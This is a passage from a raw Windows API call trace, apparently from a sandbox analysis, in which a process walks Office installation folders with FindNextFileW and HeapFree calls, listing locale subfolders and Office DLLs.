lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0297.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.270] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0297.276] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.276] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0297.282] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.282] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0297.578] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.579] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f23aa6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0297.604] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.605] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0297.608] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.608] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf158c060, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0297.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.611] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Interop.MSDASC.dll", cAlternateFileName="INTERO~1.DLL")) returned 1 [0297.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.615] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0297.619] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.619] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0297.622] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.622] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0297.852] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.852] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0297.859] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.859] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0297.866] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.866] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MDXQueryGenerator.DLL", cAlternateFileName="MDXQUE~1.DLL")) returned 1 [0298.365] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0298.365] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0298.369] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0298.369] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0298.372] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0298.372] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5ad675f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5ad675f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5ad675f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6faa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE.DLL", cAlternateFileName="")) returned 1 [0298.377] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0298.377] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba48, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPivotExcelClientAddIn.dll", cAlternateFileName="POWERP~1.DLL")) returned 1 [0298.398] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0298.398] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0298.813] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0298.813] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae48f06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae48f06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae6f174, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportingServicesNativeClient.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0299.547] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.547] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefee59ce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1026", cAlternateFileName="")) returned 1 [0299.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.548] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1755c61, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="10266", cAlternateFileName="")) returned 1 [0299.550] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.550] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1027", cAlternateFileName="")) returned 1 [0299.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.552] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1028", cAlternateFileName="")) returned 1 [0299.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.554] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1029", cAlternateFileName="")) returned 1 [0299.557] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.557] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf7a22a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1030", cAlternateFileName="")) returned 1 [0299.559] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.559] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1031", cAlternateFileName="")) returned 1 [0299.564] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.564] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51e6a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1032", cAlternateFileName="")) returned 1 [0299.568] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.568] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42fef17, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 1 [0299.569] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.569] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1035", cAlternateFileName="")) returned 1 [0299.570] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.570] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0299.572] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.572] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1037", cAlternateFileName="")) returned 1 [0299.573] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.573] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x88e2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1038", cAlternateFileName="")) returned 1 [0299.574] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.574] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1040", cAlternateFileName="")) returned 1 [0299.576] HeapFree (hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00) [0299.576] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.576] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1041", cAlternateFileName="")) returned 1 [0299.578] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.578] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf048f354, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1042", cAlternateFileName="")) returned 1 [0299.579] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.579] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1043", cAlternateFileName="")) returned 1 [0299.580] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.580] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1044", cAlternateFileName="")) returned 1 [0299.581] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.581] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf2ebae3b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf2ebae3b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1045", cAlternateFileName="")) returned 1 [0299.582] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.582] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1887f3e, 